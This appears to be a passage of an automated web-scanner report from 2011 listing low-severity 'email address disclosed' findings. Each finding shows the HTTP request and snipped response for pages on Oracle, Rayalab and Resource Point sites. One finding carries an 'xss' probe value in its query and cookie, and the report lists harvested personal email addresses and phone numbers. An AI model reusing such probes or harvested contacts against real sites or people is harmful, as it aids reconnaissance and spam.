Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008621831412329,0:1)
Date: Tue, 06 Sep 2011 16:15:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:insight_ww@oracle.com">
...[SNIP]...
<a href="mailto:insight_ww@oracle.com">
...[SNIP]...

22.71. http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/BoardofDirectors/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/corporate/press/BoardofDirectors/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35660476075859156,0:1)
Date: Tue, 06 Sep 2011 16:13:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:Oracle-Press_ww@oracle.com">
...[SNIP]...
<a href="mailto:Oracle-Press_ww@oracle.com">
...[SNIP]...

22.72. http://www.oracle.com/us/corporate/press/Executives/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/Executives/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/corporate/press/Executives/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41172984997271740,0:1)
Date: Tue, 06 Sep 2011 16:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:Oracle-Press_ww@oracle.com">
...[SNIP]...
<a href="mailto:Oracle-Press_ww@oracle.com">
...[SNIP]...

22.73. http://www.oracle.com/us/corporate/press/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/press/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/corporate/press/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35711371439084667,0:1)
Date: Tue, 06 Sep 2011 16:13:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content
...[SNIP]...
<a href="mailto:Oracle-Press_ww@oracle.com">
...[SNIP]...
<a href="mailto:Oracle-Press_ww@oracle.com">
...[SNIP]...

22.74. http://www.oracle.com/us/corporate/profit/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/profit/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/corporate/profit/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41045476007478889,0:1)
Date: Tue, 06 Sep 2011 16:15:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:jennifer.hamilton@oracle.com">
...[SNIP]...

22.75. http://www.oracle.com/us/corporate/publishing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/corporate/publishing/index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /us/corporate/publishing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166585496136002,0:1)
Date: Tue, 06 Sep 2011 16:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:jennifer.hamilton@oracle.com">jennifer.hamilton@oracle.com</a>
...[SNIP]...
<a href="mailto:kevin.collopy@edithroman.com"><span class="bodylink">kevin.collopy@edithroman.com</span>
...[SNIP]...
<a href="mailto:frank.cipolla@epostdirect.com">frank.cipolla@epostdirect.com</a>
...[SNIP]...

22.76. http://www.oracle.com/us/education/oukc/email-079121.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/education/oukc/email-079121.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/education/oukc/email-079121.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41070167774850150,0:1)
Date: Tue, 06 Sep 2011 16:08:27 GMT
Content-Length: 31255
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<form action="mailto:olntech_us@oracle.com?subject=On-line Technical Support" method="post" enctype="text/plain" onSubmit ="return checkForm(this)" name="techform">
...[SNIP]...

22.77. http://www.oracle.com/us/industries/financial-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/financial-services/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/industries/financial-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41122746764032528,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:financialservices_ww@oracle.com?subject=Oracle Financial Services RFP/RFI Submission&amp;body=Company:%0AContact Name:%0AJob Title:%0APhone:%0ACountry:%0AOffering sought from Oracle:%0ADeadline for submission of response from Oracle
...[SNIP]...
<a href="mailto:financialservices_ww@oracle.com?subject=Oracle Financial Services RFP/RFI Submission&amp;body=Company:%0AContact Name:%0AJob Title:%0APhone:%0ACountry:%0AOffering sought from Oracle:%0ADeadline for submission of response from Oracle
...[SNIP]...
<a href="mailto:financialservices_ww@oracle.com">
...[SNIP]...

22.78. http://www.oracle.com/us/industries/retail/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/industries/retail/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/industries/retail/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41103114469486884,0:1)
Date: Tue, 06 Sep 2011 16:16:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:oneretailvoice_ww@oracle.com?subject=Oracle Retail Voice Submission&amp;body=Company:%0AContact Name:%0AJob Title:%0APhone:%0AEmail Address:%0A">
...[SNIP]...
<a href="mailto:oneretailvoice_ww@oracle.com?subject=Oracle Retail Voice Submission&amp;body=Company:%0AContact Name:%0AJob Title:%0APhone:%0AEmail Address:%0A">
...[SNIP]...

22.79. http://www.oracle.com/us/partnerships/solutions/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/partnerships/solutions/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/partnerships/solutions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=7;ecid=35762992651810657,0:1)
Date: Tue, 06 Sep 2011 16:16:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 682670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:partnerintegration_us@oracle.com">
...[SNIP]...

22.80. http://www.oracle.com/us/products/applications/primavera/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/products/applications/primavera/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/products/applications/primavera/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166877553917005,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 146321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:PRIMNEWS_us@oracle.com">
...[SNIP]...

22.81. http://www.oracle.com/us/sun/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/sun/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/sun/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=242;ecid=35989165629261333,0:1)
Date: Tue, 06 Sep 2011 16:16:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:acquisition-inquiries_ww@oracle.com">
...[SNIP]...
<a href="mailto:acquisition-inquiries_ww@oracle.com">
...[SNIP]...

22.82. http://www.oracle.com/us/support/advanced-customer-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/advanced-customer-services/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /us/support/advanced-customer-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41102401504905518,0:1)
Date: Tue, 06 Sep 2011 16:16:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:acsdirect_us@oracle.com">acsdirect_us@oracle.com</a>
...[SNIP]...

22.83. http://www.oracle.com/us/support/contact-068555.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/contact-068555.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /us/support/contact-068555.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40983856110748860,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="mailto:servicecontracts_ee@oracle.com">servicecontracts_ee@oracle.com</a>
...[SNIP]...
<a href="mailto:servicecontracts_de@oracle.com">servicecontracts_de@oracle.com</a>
...[SNIP]...
<a href="mailto:servicecontracts_it@oracle.com">servicecontracts_it@oracle.com</a>
...[SNIP]...
<a href="mailto:servicecontracts_lt@oracle.com">servicecontracts_lt@oracle.com</a>
...[SNIP]...

22.84. http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracleimg.com
Path:   /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js HTTP/1.1
Host: www.oracleimg.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/go/index.html?Src=7013425&Act=226&pcode=WWMK10042957MPP055
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 31 Aug 2011 13:57:01 GMT
ETag: "ad6050-75f4-4abcd80990540"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=171;ecid=17089556641633103,0:1)
Content-Length: 30196
Date: Tue, 06 Sep 2011 15:54:06 GMT
Connection: close

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.85. http://www.rayalab.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?gclid=CMuoq_OIiasCFRligwodfwxd4w HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:36 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Sat, 19 Mar 2011 16:04:36 GMT
ETag: "152efb-1e857-49ed80d11d5a1"
Accept-Ranges: bytes
Content-Length: 125015
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Raya Cosmetic Manuf
...[SNIP]...
<a href="mailto:e-mail: rosawest@aol.com" class="email">
...[SNIP]...
<a href="mailto:e-mail: rosawest@aol.com" class="email">
...[SNIP]...
<a href="mailto:rosawest@aol.com" class="email">E-mail:rosawest@aol.com</a>
...[SNIP]...
<a href="mailto:rosawest@aol.com" class="rayalab_text">E-mail: rosawest@aol.com</a>
...[SNIP]...

22.86. http://www.rayalab.com/free_sample.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayalab.com
Path:   /free_sample.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /free_sample.html HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=258269193.1974267751.1315345538.1315345538.1315345538.1; __utmb=258269193.1.10.1315345538; __utmc=258269193; __utmz=258269193.1315345538.1.1.utmgclid=CMuoq_OIiasCFRligwodfwxd4w|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:43 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 12 Aug 2009 02:39:57 GMT
ETag: "1889b3-4dcf-470e8bc1fda56"
Accept-Ranges: bytes
Content-Length: 19919
Content-Type: text/html
X-Pad: avoid browser bug

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:e-mail: rosawest@aol.com" class="email">
...[SNIP]...
<a href="mailto:e-mail: rosawest@aol.com" class="email">
...[SNIP]...
<a href="mailto:rosawest@aol.com" class="email">E-mail:rosawest@aol.com</a>
...[SNIP]...
<td colspan="6" align="center" class="rayalab_green">USA: 1-(800)-525-7292 &nbsp;&nbsp; INTERNATIONAL:-(818)-763-7292 &nbsp;&nbsp; FAX: 1-(818)-760-1069 &nbsp;&nbsp; E-mail: rosawest@aol.com</td>
...[SNIP]...
<a href="mailto:rosawest@aol.com" class="rayalab_left">ROSAWEST@AOL.COM</a>
...[SNIP]...
<td colspan="6" align="center" class="rayalab_green">USA: 1-(800)-525-7292 &nbsp;&nbsp; INTERNATIONAL:-(818)-763-7292 &nbsp;&nbsp; FAX: 1-(818)-760-1069 &nbsp;&nbsp; E-mail: rosawest@aol.com</td>
...[SNIP]...

22.87. http://www.resourcepoint.net/ATG-Services.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /ATG-Services.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ATG-Services.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 21 Jan 2011 14:55:02 GMT
Accept-Ranges: bytes
ETag: "93a6dc2e7bb9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:39 GMT
Content-Length: 18756

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ATG Services offered by Resource Point</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="mailto:ATGservices@resourcepoint.net" class="orangebullet">ATGservices@ResourcePoint.net</a>
...[SNIP]...

22.88. http://www.resourcepoint.net/TibcoTech.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /TibcoTech.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TibcoTech.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/?string=faq+help+oss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: name=faq help oss; __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330594898:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.9.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 21 Jan 2011 14:55:00 GMT
Accept-Ranges: bytes
ETag: "07a292d7bb9cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:43 GMT
Content-Length: 26980

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point - Tibco Technologies</title>
<meta name="robots" content="index, follow">
<meta http-equiv="
...[SNIP]...
<a href="mailto:tibcoservices@resourcepoint.net" class="orangebullet">TibcoServices@ResourcePoint.net</a>
...[SNIP]...

22.89. http://www.resourcepoint.net/contactus.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /contactus.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contactus.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 11:14:06 GMT
Accept-Ranges: bytes
ETag: "0d34654d20cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:16 GMT
Content-Length: 56853

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Resource Point - Contact Us | Contact for business success</title>
<meta name="robots" content="index, follo
...[SNIP]...
<a href="mailto:info@resourcepoint.net" class="orangebullet">info@ResourcePoint.net</a>
...[SNIP]...
<a href="mailto:careers@resourcepoint.net" class="orangebullet">careers@ResourcePoint.net</a>
...[SNIP]...
<a href="mailto:hr@resourcepoint.net" class="orangebullet">hr@ResourcePoint.net</a>
...[SNIP]...

22.90. http://www.resourcepoint.net/form.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcepoint.net
Path:   /form.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /form.htm?i=Searchkeywordnotfound&abt=xss HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; name=xss

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 30 Jun 2010 21:13:48 GMT
Accept-Ranges: bytes
ETag: "04e6c219918cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:36:16 GMT
Content-Length: 13435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="images/rp_style.css" type="text/css">
<link rel="stylesheet" href="images/tis_style.css"
...[SNIP]...
st you whether you are looking for a full-time position in any IT disciplines...";
var strcontactus="If you have a specific question that's not addressed here or if you have suggestions contact us at info@resourcepoint.net or call ...";

function getPrint(print_area)
{
   
var not=window.location.href.split("?")[1];

var not1=not.split("=")[1];
var result=window.location.href.split("?")[1].split("&")[1].split("=")
...[SNIP]...

22.91. http://www.revsolutionsinc.com/careers.html

Summary

Severity:   Information
